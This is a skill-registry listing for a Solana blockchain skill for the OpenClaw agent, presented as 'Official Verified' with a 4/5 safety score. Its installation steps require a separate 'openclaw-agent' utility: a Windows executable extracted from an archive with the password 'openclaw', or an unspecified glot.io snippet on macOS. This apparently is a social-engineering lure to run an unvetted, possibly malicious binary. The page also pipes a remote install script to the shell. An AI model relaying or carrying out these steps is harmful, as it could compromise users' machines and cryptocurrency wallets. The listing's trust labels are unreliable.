ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain capabilities into OpenClaw. Track wallet balances, audit SPL tokens, inspect NFTs, and monitor transactions easily.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-fckyq
Or

What This Skill Does

The Solana skill for OpenClaw empowers users to interact directly with the Solana blockchain ecosystem. It serves as a comprehensive toolkit for monitoring wallet balances, auditing SPL token holdings, inspecting NFT metadata, and tracking transaction histories. By integrating with the required openclaw-agent utility, this skill bridges the gap between local CLI-based blockchain operations and an automated agentic workflow, allowing for programmatic querying of mainnet data without requiring manual terminal intervention for every command.

Installation

Installation is a two-step process to ensure security and functionality. First, install the skill into your OpenClaw environment using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-fckyq. Second, you must install the openclaw-agent utility. For Windows, download the official release, extract using the password 'openclaw', and run the executable. For macOS, follow the instructions provided via the specified glot.io snippet. Ensure the Solana CLI toolchain is installed via sh -c "$(curl -sSfL https://release.solana.com/stable/install)" and configured for the desired cluster (defaulting to https://api.mainnet-beta.solana.com).

Use Cases

  • Portfolio Auditing: Quickly retrieve current SOL and SPL token balances for multiple addresses.
  • NFT Research: Decode mint addresses to view NFT metadata and ownership details.
  • Transaction Monitoring: Verify incoming or outgoing transactions for specific accounts.
  • Automated Alerts: Use the watch functionality to trigger notifications or logs when an address balance changes.
  • Governance Tracking: Inspect stake accounts and delegator information.

Example Prompts

  1. "Check the current SOL balance for my wallet address: [INSERT_ADDRESS] and list all my active SPL tokens."
  2. "Get the metadata for this NFT mint address: [INSERT_NFT_MINT] and tell me if it's currently listed."
  3. "Show me the last 5 transactions for this account and confirm the details for the most recent signature."

Tips & Limitations

Always ensure your openclaw-agent is running in the background; blockchain operations will fail without it. Use the --output json flag when you need to pipe data into other scripts or processes. Be aware that the Solana blockchain has high throughput; very frequent queries to public RPC endpoints might trigger rate limits, so consider using a dedicated private RPC provider for production-level monitoring. Always double-check addresses before executing commands involving token transfers or staking.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-fckyq": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#defi
Safety Score: 4/5

Flags: network-access, code-execution